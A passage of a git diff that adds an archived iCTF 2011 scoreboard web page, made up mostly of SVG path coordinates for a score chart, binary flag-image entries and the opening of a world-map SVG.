126.40136660724897 253.38685953523805 L 128.3770053475936 253.38685953523805 L 130.35264408793822 253.38685953523805 L 132.32828282828285 253.38685953523805 L 134.3039215686275 253.38685953523805 L 136.2795603089721 253.38685953523805 L 138.25519904931673 253.38685953523805 L 140.23083778966134 253.38685953523805 L 142.20647653000597 253.38685953523805 L 144.18211527035058 253.2981610209523 L 146.15775401069521 253.2981610209523 L 148.13339275103985 253.15956310857143 L 150.10903149138446 253.15956310857143 L 152.0846702317291 253.15956310857143 L 154.0603089720737 252.9980384457143 L 156.03594771241833 252.7773171657143 L 158.01158645276294 252.61537302857124 L 159.98722519310758 252.36107012571395 L 161.96286393345218 252.01977366857108 L 163.93850267379682 251.84113174857126 L 165.91414141414145 251.56153860571413 L 167.88978015448606 251.0359440914284 L 169.8654188948307 250.89401350095216 L 171.8410576351753 250.5291328914284 L 173.81669637551994 250.20632092952377 L 175.79233511586455 249.97510489904766 L 177.76797385620918 249.72908153904768 L 179.74361259655382 249.53915102476196 L 181.71925133689842 248.7497274819048 L 183.69489007724306 248.5115658819048 L 185.67052881758767 248.19870572190482 L 187.6461675579323 247.64572359619052 L 189.6218062982769 247.5101048533334 L 191.59744503862154 247.0172648533334 L 193.57308377896615 246.5149951390475 L 195.5487225193108 246.33216298666662 L 197.52436125965542 245.37607283809518 L 199.50000000000003 244.9374008380952 L 201.47563874034466 244.33635169523802 L 203.45127748068927 243.59505436952375 L 205.4269162210339 242.98826000761926 L 207.4025549613785 242.72658304000032 L 209.37819370172315 242.40117924571462 L 211.35383244206778 242.07048804571463 L 213.3294711824124 241.90993764571462 L 215.30510992275703 241.25916050285747 L 217.28074866310163 240.8874183314289 L 219.25638740344627 239.81628736000033 L 221.23202614379088 238.8560295314289 L 223.2076648841355 237.77911387428605 L 225.18330362448012 237.2949255314289 L 227.15894236482475 236.10424438857177 L 229.1345811051694 234.80847478857174 L 231.110219845514 234.28145947428607 L 233.08585858585863 233.19490267428606 L 235.06149732620324 232.82316050285746 L 237.03713606654787 232.32578409142891 L 239.01277480689248 232.32578409142891 L 240.98841354723712 231.48969459809535 L 242.96405228758175 230.84367036952392 L 244.93969102792636 230.36298553904766 L 246.915329768271 230.31479673904767 L 248.8909685086156 230.26191140571444 L 250.86660724896024 229.85109723428587 L 252.84224598930484 229.45724527238087 L 254.81788472964945 229.14227364571394 L 256.79352346999406 228.56958975999964 L 258.7691622103387 228.44012217904717 L 260.7448009506833 228.218791420952 L 262.72043969102793 227.94151046095197 L 264.69607843137254 227.85038643809486 L 266.6717171717172 227.748743420952 L 268.6473559120618 227.748743420952 L 270.6229946524064 227.748743420952 L 272.598633392751 227.748743420952 L 274.5742721330957 227.748743420952 L 276.5499108734403 227.748743420952 L 278.5255496137849 227.748743420952 L 280.50118835412957 227.748743420952 L 282.4768270944742 227.748743420952 L 284.4524658348188 227.748743420952 L 286.4281045751634 227.748743420952 L 288.40374331550805 227.748743420952 L 290.37938205585266 227.748743420952 L 292.35502079619727 227.748743420952 L 294.33065953654193 227.748743420952 L 296.30629827688654 227.748743420952 L 298.28193701723114 227.748743420952 L 300.25757575757575 227.40262639238057 L 302.2332144979204 227.40262639238057 L 304.208853238265 227.40262639238057 L 306.1844919786096 227.40262639238057 L 308.1601307189543 227.40262639238057 L 310.1357694592989 227.40262639238057 L 312.1114081996435 227.40262639238057 L 314.0870469399881 227.26269112380913 L 316.0626856803328 227.26269112380913 L 318.0383244206774 227.26269112380913 L 320.013963161022 227.2270921904759 L 321.98960190136665 226.9217273142857 L 323.96524064171126 226.61864022857142 L 325.94087938205587 226.51412460190477 L 327.9165181224005 224.04406380190477 L 329.89215686274514 221.5894288304762 L 331.86779560308975 218.1759568304762 L 333.84343434343435 216.93600437333333 L 335.81907308377896 215.35831760761906 L 337.7947118241236 214.51450899809495 L 339.77035056446823 213.30465607619098 L 341.74598930481284 212.37551827809546 L 343.7216280451575 210.82673351619013 L 345.6972667855021 210.82673351619013 L 347.6729055258467 210.82673351619013 L 349.6485442661913 210.82673351619013 L 351.624183006536 210.82673351619013 L 353.5998217468806 210.82673351619013 L 355.5754604872252 210.82673351619013 L 357.55109922756986 210.82673351619013 L 359.52673796791447 210.82673351619013 L 361.5023767082591 210.82673351619013 L 363.4780154486037 210.82673351619013 L 365.45365418894835 210.82673351619013 L 367.42929292929296 210.82673351619013 L 369.40493166963756 210.82673351619013 L 371.3805704099822 210.82673351619013 L 373.35620915032683 210.82673351619013 L 375.33184789067144 210.82673351619013 L 377.30748663101605 208.58919678476155 L 379.2831253713607 206.56262855619013 L 381.2587641117053 206.56262855619013 L 383.2344028520499 206.56262855619013 L 385.2100415923946 206.56262855619013 L 387.1856803327392 206.56262855619013 L 389.1613190730838 206.56262855619013 L 391.1369578134284 206.56262855619013 L 393.1125965537731 205.97162424380872 L 395.0882352941177 204.12246431999927 L 405.0882352941177 204.12246431999927" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 253.71428571428572 L 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.71428571428572 L 175.79233511586455 253.3976502857143 L 177.76797385620918 253.10150820571428 L 179.74361259655382 252.84318646857142 L 181.71925133689842 252.60570989714284 L 183.69489007724306 252.60570989714284 L 185.67052881758767 252.60570989714284 L 187.6461675579323 252.60570989714284 L 189.6218062982769 252.60570989714284 L 191.59744503862154 252.60570989714284 L 193.57308377896615 252.60570989714284 L 195.5487225193108 252.60570989714284 L 197.52436125965542 252.60570989714284 L 199.50000000000003 252.60570989714284 L 201.47563874034466 252.60570989714284 L 203.45127748068927 250.98599789714285 L 205.4269162210339 250.98599789714285 L 207.4025549613785 250.98599789714285 L 209.37819370172315 250.98599789714285 L 211.35383244206778 250.98599789714285 L 213.3294711824124 250.98599789714285 L 215.30510992275703 250.98599789714285 L 217.28074866310163 250.98599789714285 L 219.25638740344627 250.98599789714285 L 221.23202614379088 250.98599789714285 L 223.2076648841355 250.4364527542857 L 225.18330362448012 249.93511332571427 L 227.15894236482475 249.93511332571427 L 229.1345811051694 249.53982646857145 L 231.110219845514 249.53982646857145 L 233.08585858585863 249.53982646857145 L 235.06149732620324 249.53982646857145 L 237.03713606654787 249.53982646857145 L 239.01277480689248 249.53982646857145 L 240.98841354723712 249.53982646857145 L 242.96405228758175 249.53982646857145 L 244.93969102792636 249.53982646857145 L 246.915329768271 249.53982646857145 L 248.8909685086156 249.53982646857145 L 250.86660724896024 249.53982646857145 L 252.84224598930484 249.53982646857145 L 254.81788472964945 249.53982646857145 L 256.79352346999406 249.53982646857145 L 258.7691622103387 248.86735393523855 L 260.7448009506833 247.3421166780957 L 262.72043969102793 245.7781879923814 L 264.69607843137254 244.8127543923814 L 266.6717171717172 243.33746784000272 L 268.6473559120618 243.33746784000272 L 270.6229946524064 240.63312726857413 L 272.598633392751 239.97671766857414 L 274.5742721330957 239.53577238857414 L 276.5499108734403 238.19585650285984 L 278.5255496137849 236.10180027428842 L 280.50118835412957 234.534150445717 L 282.4768270944742 234.534150445717 L 284.4524658348188 234.26227021714556 L 286.4281045751634 233.96496781714555 L 288.40374331550805 233.41542267428844 L 290.37938205585266 232.85141581714555 L 292.35502079619727 231.14493353143126 L 294.33065953654193 226.42077353143128 L 296.30629827688654 225.04259753143128 L 298.28193701723114 220.39556667428843 L 300.25757575757575 219.74250610285986 L 302.2332144979204 215.66785467428844 L 304.208853238265 214.29103181714726 L 306.1844919786096 213.48981901714558 L 308.1601307189543 212.21140347428843 L 310.1357694592989 211.19806861714557 L 312.1114081996435 210.66261476571697 L 314.0870469399881 209.9221749942884 L 316.0626856803328 209.65511533714556 L 318.0383244206774 208.45868333714554 L 320.013963161022 208.19258779428841 L 321.98960190136665 208.19258779428841 L 323.96524064171126 208.19258779428841 L 325.94087938205587 208.19258779428841 L 327.9165181224005 208.19258779428841 L 329.89215686274514 208.19258779428841 L 331.86779560308975 208.19258779428841 L 333.84343434343435 208.19258779428841 L 335.81907308377896 208.19258779428841 L 337.7947118241236 208.19258779428841 L 339.77035056446823 208.19258779428841 L 341.74598930481284 208.19258779428841 L 343.7216280451575 208.19258779428841 L 345.6972667855021 208.19258779428841 L 347.6729055258467 208.19258779428841 L 349.6485442661913 208.19258779428841 L 351.624183006536 208.19258779428841 L 353.5998217468806 208.19258779428841 L 355.5754604872252 208.19258779428841 L 357.55109922756986 208.19258779428841 L 359.52673796791447 208.19258779428841 L 361.5023767082591 208.19258779428841 L 363.4780154486037 208.19258779428841 L 365.45365418894835 208.19258779428841 L 367.42929292929296 208.19258779428841 L 369.40493166963756 208.19258779428841 L 371.3805704099822 208.19258779428841 L 373.35620915032683 208.19258779428841 L 375.33184789067144 208.19258779428841 L 377.30748663101605 208.19258779428841 L 379.2831253713607 208.19258779428841 L 381.2587641117053 208.19258779428841 L 383.2344028520499 208.19258779428841 L 385.2100415923946 208.19258779428841 L 387.1856803327392 208.19258779428841 L 389.1613190730838 208.19258779428841 L 391.1369578134284 208.19258779428841 L 393.1125965537731 208.19258779428841 L 395.0882352941177 208.19258779428841 L 405.0882352941177 208.19258779428841" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path></g><rect rx="3" ry="3" fill="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-183)" x="0.5" y="0.5" width="23" height="19" stroke-width="1" transform="translate(654,10)" zIndex="19" stroke="#000000"></rect><rect rx="3" ry="3" fill="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-184)" x="0.5" y="0.5" width="23" height="19" stroke-width="1" transform="translate(628,10)" zIndex="19" stroke="#000000"></rect><path d="M 6 17 L 18 17 18 14 6 14 Z M 12 14 L 9 9 11 9 11 5 13 5 13 9 15 9 Z" fill="#55BE3B" transform="translate(654,10)" stroke="#C0C0C0" stroke-width="1" zIndex="20"></path><path d="M 6 14 L 18 14 18 9 6 9 Z M 9 9 L 9 5 15 5 15 9 Z M 9 14 L 7.5 17 16.5 17 15 14 Z" fill="#7797BE" transform="translate(628,10)" stroke="#C0C0C0" stroke-width="1" zIndex="20"></path><rect rx="0" ry="0" fill="rgb(255,255,255)" x="654" y="10" width="24" height="20" stroke-width="0.000001" id="exportButton" fill-opacity="0.001" title="Export to raster or vector image" zIndex="21" style="cursor:pointer;"><title>Export to raster or vector image</title></rect><rect rx="0" ry="0" fill="rgb(255,255,255)" x="628" y="10" width="24" height="20" stroke-width="0.000001" id="printButton" fill-opacity="0.001" title="Print the chart" zIndex="21" style="cursor:pointer;"><title>Print the chart</title></rect></svg></div></div> + + +</body></html> +\ No newline at end of file diff --git a/ictf2011/scoreboard.ictf2011.info_files/sg.png b/ictf2011/scoreboard.ictf2011.info_files/sg.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011.info_files/us.png b/ictf2011/scoreboard.ictf2011.info_files/us.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011.info_files/world.svg b/ictf2011/scoreboard.ictf2011.info_files/world.svg @@ -0,0 +1,19 @@ +<svg xmlns:dc="http://purl.org/dc/elements/1.1/" + xmlns:cc="http://web.resource.org/cc/" + xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" + xmlns:svg="http://www.w3.org/2000/svg" + xmlns="http://www.w3.org/2000/svg" + id="svg2" + width="1260" + height="630" + version="1.0" +> + <path + style="fill:#4265AC" + d="M -3.0314879e-016,609.68431 L -6.0629759e-016,589.36862 L 11.75,588.04884 C 18.2125,587.32297 24.625,586.67753 26,586.61453 C 27.375,586.55154 28.886087,585.89064 29.357971,585.14586 C 30.008374,584.11932 32.790563,583.84998 40.857971,584.03255 C 54.332772,584.33748 54.983923,584.28211 53,583 C 51.87625,582.27378 52.377916,582.03348 55,582.042 C 61.670544,582.06367 90.514119,578.86505 93.5,577.77252 C 95.15,577.16879 98.75,576.55931 101.5,576.41812 C 125.10454,575.20624 142.07015,573.31075 144.88532,571.57088 C 145.56247,571.15237 149.80279,571.28724 154.30825,571.87058 C 158.81371,572.45392 170.5568,573.17409 180.40399,573.47095 C 191.32866,573.80031 198.83268,574.44618 199.65399,575.1278 C 200.71115,576.00516 201,575.78268 201,574.09106 C 201,571.16422 203.20599,570.53804 206.86008,572.42765 C 208.53241,573.29244 211.40803,574 213.25034,574 C 215.09265,574 217.0275,574.39871 217.55,574.88603 C 218.0725,575.37334 221.2,576.09163 224.5,576.48222 L 230.5,577.19239 L 228.09699,575.09619 C 226.77533,573.94329 226.10033,572.95514 226.59699,572.90032 C 227.09365,572.8455 226.375,572.46816 225,572.06179 C 223.625,571.65543 222.6125,570.80029 222.75,570.16147 C 222.8875,569.52266 222.46,569 221.8,569 C 220.86929,569 220.87035,568.72965 221.80473,567.79527 C 223.65712,565.94288 247.52573,565.3615 249.64126,567.11724 C 250.88024,568.1455 254.52874,568.41012 264.63927,568.20502 C 271.98767,568.05596 278,568.32685 278,568.80699 C 278,569.78496 307.54772,569.52614 313,568.50042 C 315.01239,568.12183 319.25512,568.479 322.98217,569.34075 C 326.83539,570.23167 330.07991,570.49378 330.98217,569.98701 C 332.81894,568.95536 331.7478,568.48579 325.58631,567.62156 C 323.43378,567.31964 321.25459,566.65459 320.74367,566.14367 C 319.57534,564.97534 321.71138,560.70359 323.05017,561.53101 C 323.57258,561.85387 324,561.64148 324,561.05902 C 324,560.47656 322.875,560 321.5,560 C 320.125,560 319,559.55 319,559 C 319,558.16451 324.16411,557.63472 332.20028,557.64578 C 333.13543,557.64706 333.68543,557.30003 333.42249,556.87459 C 333.15955,556.44914 334.56291,555.79742 336.54106,555.42632 C 339.52411,554.8667 340.39153,555.11398 341.62556,556.87579 C 343.22039,559.15273 345.16162,559.75088 344.75,557.83853 C 344.6125,557.19971 345.625,556.39193 347,556.04344 C 350.39462,555.18309 350.27261,552.5 346.83886,552.5 C 343.36886,552.5 342.39379,551.43537 344.04337,549.44774 C 344.99229,548.30436 346.29613,548.02057 348.60789,548.45426 C 351.70224,549.03477 353.44416,548.00931 353.48469,545.58333 C 353.49311,545.07917 354.0625,544.47917 354.75,544.25 C 355.4375,544.02083 356,544.31119 356,544.89523 C 356,545.61953 356.80707,545.58939 358.53864,544.80044 C 359.93489,544.16427 360.86164,543.08182 360.59808,542.39499 C 359.96205,540.73753 362.59351,538.63004 364.42266,539.33195 C 365.21913,539.63758 366.03279,539.40162 366.23081,538.80758 C 366.47179,538.08462 367.32981,538.18585 368.82593,539.11376 C 370.26605,540.00694 371.31693,540.14432 371.78051,539.5 C 372.59262,538.37127 372.65828,538.35253 383.1626,536.25155 C 387.37704,535.40862 391.65204,535.05958 392.6626,535.4759 C 394.69373,536.31266 394.23519,536.54613 388.76422,537.46075 C 386.67661,537.80975 385.13246,538.60749 385.26422,539.26891 C 385.3939,539.91989 384.42416,540.6153 383.10924,540.81426 C 381.15472,541.10999 380.84465,540.84721 381.40993,539.37413 C 381.91126,538.06769 381.45036,538.24971 379.73363,540.03613 C 378.43137,541.39126 377.5229,542.81773 377.71481,543.20607 C 377.90672,543.59441 376.90129,544.6738 375.48052,545.60472 C 373.67427,546.78822 373.21352,547.61352 373.94865,548.34865 C 374.52689,548.92689 375,550.21 375,551.2 C 375,552.45333 375.75926,553 377.5,553 C 380.22207,553 380.28844,553.08477 379.39301,555.41821 C 379.05917,556.2882 377.95,557 376.92819,557 C 374.24121,557 372.63654,560.45236 374.0746,563.13939 C 374.70433,564.31605 375.58899,566.5669 376.04052,568.14127 C 376.71216,570.48314 376.4962,571.19926 374.85318,572.07858 C 373.74861,572.66972 373.07984,573.76568 373.36701,574.51404 C 373.65674,575.26906 373.13488,576.05625 372.19457,576.28259 C 370.78704,576.62139 370.75408,576.7765 372,577.19827 C 377.4324,579.03726 393.2906,582.36278 402.0833,583.50683 C 407.81249,584.25228 416.02812,585.61876 420.34026,586.54344 C 426.74178,587.91617 429.21912,588.02236 433.84026,587.12212 C 437.69121,586.37191 442.80004,586.30957 449.82588,586.92704 C 458.12508,587.65643 460.82875,587.55167 463.60106,586.39333 C 465.49819,585.60066 469.17654,584.75833 471.77519,584.52149 C 474.37384,584.28465 477.85,583.62975 479.5,583.06616 C 481.15,582.50257 484.6375,581.77955 487.25,581.45945 C 489.8625,581.13935 492,580.47542 492,579.98404 C 492,579.49266 493.6875,578.78824 495.75,578.41865 C 497.8125,578.04907 500.24729,577.09532 501.16066,576.29921 C 502.07402,575.5031 505.25292,574.52176 508.22488,574.11846 C 511.71442,573.64492 514.88379,572.42768 517.17245,570.68204 C 519.62468,568.81163 521.76131,568.03605 524.10822,568.16442 C 528.2281,568.38976 539.32898,566.22981 543.65113,564.36186 C 545.38425,563.61284 547.72019,563 548.84211,563 C 549.96403,563 551.11275,562.62658 551.39482,562.17018 C 551.67689,561.71379 556.54095,561.26422 562.20384,561.17114 C 573.06302,560.99266 582.66987,559.06214 582.25,557.14282 C 581.85284,555.32728 586.14658,555.81829 587.55971,557.75 C 588.708,559.31969 590.98617,559.5 609.66995,559.5 C 624.27236,559.5 631.24743,559.12812 633,558.25616 C 635.97157,556.7777 641,556.59696 641,557.96862 C 641,558.50135 641.65791,558.68477 642.46202,558.3762 C 643.26613,558.06763 648.57408,558.31582 654.25747,558.92774 C 669.53823,560.57296 675.37589,560.40372 686.96506,557.97948 C 694.19588,556.46692 697.54394,556.13182 697.7984,556.89519 C 698.33239,558.49716 702,558.25401 702,556.61663 C 702,555.11235 706.09253,553.61816 706.96422,554.80418 C 707.62307,555.7006 716.29314,558 719.01435,558 C 720.10646,558 721,558.53419 721,559.18709 C 721,559.83999 722.2375,559.21346 723.75,557.79479 C 725.78168,555.88915 728.72025,554.78238 735,553.55764 C 739.675,552.64587 745.00065,551.42948 746.83478,550.85456 C 748.66891,550.27963 751.81891,550.09385 753.83478,550.44171 C 756.12918,550.83765 757.00113,550.73836 756.16615,550.17626 C 755.0869,549.44971 755.13461,549.16232 756.41615,548.67055 C 757.28727,548.33627 758.69662,548.33009 759.54804,548.65681 C 760.44615,549.00145 761.67128,548.46346 762.46609,547.37543 C 763.63533,545.77483 765.13038,545.5114 772.66805,545.57782 C 781.42908,545.65502 787.01882,546.56892 788.0213,548.088 C 788.30801,548.52247 789.88301,549.13421 791.5213,549.44743 C 796.36985,550.37439 827.9665,551.95008 829.54669,551.34371 C 830.44176,551.00024 831,551.39598 831,552.37396 C 831,553.29655 832.15225,554.20912 833.75,554.55193 C 835.2625,554.87645 838.525,555.75312 841,556.50009 C 845.8731,557.97082 857.60053,557.20628 858.83365,555.33747 C 859.72098,553.99271 865.65044,552.00792 868.89922,551.9682 C 870.32965,551.9507 872.37351,551.2757 873.44113,550.4682 C 875.36264,549.01484 875.36264,548.98552 873.44113,547.56732 C 871.9889,546.49548 871.78589,545.84439 872.6351,544.98222 C 873.49083,544.11343 874.57727,544.24716 877.04947,545.52558 C 879.93821,547.01941 881.21156,547.07895 887.74156,546.02555 C 894.14273,544.99293 895.38586,545.03922 896.85057,546.36477 C 898.19932,547.58537 900.38553,547.80606 907.52338,547.44216 C 918.58598,546.87816 921,546.3583 921,544.53996 C 921,542.04855 923.0277,541.73886 927.68775,543.51855 C 931.41736,544.9429 932.88868,545.05032 935.98052,544.12398 C 938.04781,543.50461 941.09333,543.26867 942.74833,543.59967 C 944.50718,543.95144 946.04104,543.74261 946.44001,543.09707 C 947.21023,541.85083 951.4013,542.62206 954.5,544.58026 C 955.6,545.2754 958.64303,546.15614 961.2623,546.53746 C 963.88156,546.91878 966.23893,547.57759 966.50091,548.00147 C 966.94089,548.71338 972.18518,547.30761 974.5,545.85726 C 977.22178,544.15192 983.94121,543.91824 986.85965,545.42742 C 988.53222,546.29234 991.07761,547 992.51608,547 C 993.95455,547 995.89198,547.407 996.82147,547.90445 C 998.93482,549.03549 1012.6953,548.04776 1010.8358,546.89851 C 1009.7623,546.23505 1009.7556,545.84438 1010.8,544.8 C 1011.7027,543.89734 1012.2934,543.84059 1012.7916,544.60866 C 1013.1812,545.20922 1014.5697,546.26442 1015.8772,546.95354 C 1017.7511,547.94125 1018.4149,547.94674 1019.0127,546.97946 C 1020.0082,545.36873 1033.2036,546.11072 1033.7698,547.80926 C 1034.2712,549.31352 1040.6483,549.37806 1041.5691,547.8882 C 1041.947,547.2767 1041.7494,546.46315 1041.1299,546.08031 C 1040.5105,545.69746 1044.0528,545.57782 1049.0018,545.81443 C 1056.9641,546.19511 1058,546.04943 1058,544.549 C 1058,543.45497 1058.6209,542.98914 1059.75,543.23607 C 1060.7125,543.44656 1061.3764,544.188 1061.2252,544.88372 C 1061.0741,545.57944 1061.4313,545.85147 1062.019,545.48824 C 1062.6067,545.12501 1063.6304,545.25846 1064.2938,545.78479 C 1065.6747,546.8804 1081.6835,548.33137 1093.5,548.43192 C 1100.5436,548.49186 1101.4649,548.70922 1101.2062,550.25 C 1100.9723,551.64273 1101.6358,552 1104.4562,552 C 1106.4053,552 1108,552.37633 1108,552.83629 C 1108,553.29625 1112.2672,553.68843 1117.4827,553.7078 C 1122.6982,553.72718 1128.2107,554.21547 1129.7327,554.7929 C 1131.2547,555.37033 1135.2887,556.05832 1138.6971,556.32176 C 1142.1055,556.58521 1146.3372,557.52058 1148.1008,558.40038 C 1149.8643,559.28017 1152.7381,560 1154.487,560 C 1156.2358,560 1157.9346,560.26794 1158.2621,560.59541 C 1158.5896,560.92289 1161.9271,561.33225 1165.6787,561.5051 C 1169.4304,561.67795 1174.9218,562.52495 1177.8817,563.38732 C 1180.8416,564.24969 1183.6031,564.74528 1184.0184,564.48864 C 1184.4336,564.232 1185.3295,564.69207 1186.0091,565.51101 C 1187.0172,566.72561 1186.9459,567 1185.6224,567 C 1184.7301,567 1183.9859,567.5625 1183.9686,568.25 C 1183.9169,570.30611 1179.7432,572.6718 1175.9365,572.80262 C 1171.9021,572.94126 1166.6531,575.29878 1167.7651,576.47269 C 1168.1693,576.89936 1167.6,576.97783 1166.5,576.64706 C 1165.4,576.31629 1163.825,576.47849 1163,577.00752 C 1161.7192,577.82879 1161.7558,577.97161 1163.25,577.98469 C 1164.2125,577.99311 1165,578.45 1165,579 C 1165,579.55 1163.6766,580 1162.059,580 C 1158.216,580 1157.4403,581.44031 1159.9381,583.93809 C 1162.6064,586.60638 1166.6431,587.52899 1169.3383,586.08656 C 1172.0604,584.62974 1203.8066,585.36148 1209,587.00075 C 1210.925,587.60837 1223.1875,588.375 1236.25,588.70436 L 1260,589.30321 L 1260,609.6516 L 1260,630 L 630,630 L 0,630 L -3.0314879e-016,609.68431 z M 371,534 C 371,533.45 372.35,533 374,533 C 375.65,533 377,533.45 377,534 C 377,534.55 375.65,535 374,535 C 372.35,535 371,534.55 371,534 z M 379.5,532 C 379.83992,531.45 381.32898,531.00689 382.80902,531.01531 C 384.91378,531.02729 385.17323,531.2418 384,532 C 382.02414,533.2769 378.71083,533.2769 379.5,532 z M 392,528.96862 C 392,528.43588 392.675,528 393.5,528 C 395.42067,528 395.42067,528.6246 393.5,529.36163 C 392.675,529.67821 392,529.50135 392,528.96862 z M 425,527 C 423.70731,526.1646 423.73371,526.02851 425.19098,526.01531 C 426.12102,526.00689 427.16008,526.45 427.5,527 C 428.28218,528.2656 426.95837,528.2656 425,527 z M 338,508.1206 C 335.525,507.33369 333.275,506.37893 333,505.9989 C 332.725,505.61888 331.29979,505.01444 329.83287,504.65572 C 327.5363,504.09411 327.20214,503.5448 327.4277,500.70202 C 327.71007,497.14326 323.62261,489.71045 322.7427,492.18262 C 321.92043,494.49286 321.16088,492.63458 320.82554,487.49221 C 320.53046,482.96711 320.68713,482.53229 322.5,482.84507 C 323.6,483.03486 324.1664,482.85126 323.75868,482.43708 C 323.35095,482.0229 323.57595,481.00208 324.25868,480.16859 C 325.31559,478.8783 325.16589,478.73927 323.251,479.23271 C 319.90562,480.09476 319.45751,478.19885 322.4075,475.66399 C 323.83338,474.43878 325,472.66315 325,471.71816 C 325,469.76859 326.95903,469.32682 327.07608,471.25 C 327.20016,473.28868 329.84106,465.71545 329.92392,463.08333 C 330.01972,460.04035 328.77096,461.12318 328.61498,464.21835 C 328.53421,465.82107 327.78861,466.60057 326.10924,466.838 C 324.14421,467.11581 323.84393,466.8491 324.42294,465.34023 C 324.81038,464.33056 325.58514,461.37001 326.14463,458.76123 C 326.70411,456.15245 327.52826,453.79155 327.97607,453.51479 C 328.42389,453.23802 328.3213,451.16393 327.74809,448.90569 C 327.00174,445.96529 327.01879,444.60642 327.80817,444.11856 C 328.41442,443.74388 330.13627,440.75975 331.63451,437.48716 C 333.7639,432.83596 334.40949,429.78652 334.59179,423.5185 C 334.72006,419.10833 335.31744,414.22517 335.91929,412.66704 C 336.52115,411.10891 337.22444,407.95891 337.48214,405.66704 C 337.73985,403.37517 338.24765,399.025 338.61059,396 C 338.97352,392.975 339.3199,388.1636 339.38032,385.30801 C 339.48043,380.57633 339.1803,379.83882 335.99508,376.9894 C 334.07279,375.26975 330.30022,372.75594 327.6116,371.40314 C 321.94729,368.5531 318.04905,365.14469 318.00083,363 C 317.98228,362.175 316.88872,359.7 315.5707,357.5 C 314.25268,355.3 311.48838,350.20089 309.4278,346.16864 C 307.36723,342.1364 304.61139,338.13625 303.30372,337.27944 C 301.99605,336.42262 301.10695,335.22173 301.32794,334.61079 C 301.54893,333.99986 301.32311,332.70949 300.82611,331.74331 C 300.15209,330.433 300.55231,329.35678 302.40116,327.50793 C 304.81072,325.09837 304.82633,324.99176 302.96083,323.68512 C 301.40146,322.59289 301.20692,321.79366 301.92278,319.42049 C 303.45016,314.35705 306.09084,310 307.63226,310 C 308.44944,310 308.83948,309.54929 308.49903,308.99842 C 308.15857,308.44756 309.2413,306.7535 310.90509,305.23387 C 313.61413,302.75954 313.92309,301.87817 313.8624,296.7975 C 313.81174,292.5562 313.31572,290.69071 311.89732,289.40707 C 310.85379,288.4627 310,286.88633 310,285.90403 C 310,284.92173 309.54655,283.83779 308.99233,283.49526 C 307.56339,282.61213 304.89562,285.56441 305.55943,287.29428 C 305.90386,288.19185 305.33588,288.94041 304.05656,289.27496 C 302.92545,289.57075 302,289.37457 302,288.83899 C 302,288.30342 301.10283,288.14997 300.00629,288.498 C 298.4412,288.99474 298.14887,288.77562 298.64652,287.47878 C 299.11216,286.26534 298.77864,285.89057 297.39023,286.06707 C 294.80535,286.39568 292,285.05965 292,283.5 C 292,282.1384 289.25914,280.56836 287.3834,280.85548 C 285.90234,281.0822 283.70951,278.37147 284.19523,276.91432 C 285.04926,274.35221 279.11114,269.95294 271.40195,267.43641 C 266.27494,265.76279 262.29652,263.69373 259.70693,261.3542 C 256.50343,258.46002 255.29692,257.93788 253.14112,258.5127 C 248.10409,259.85576 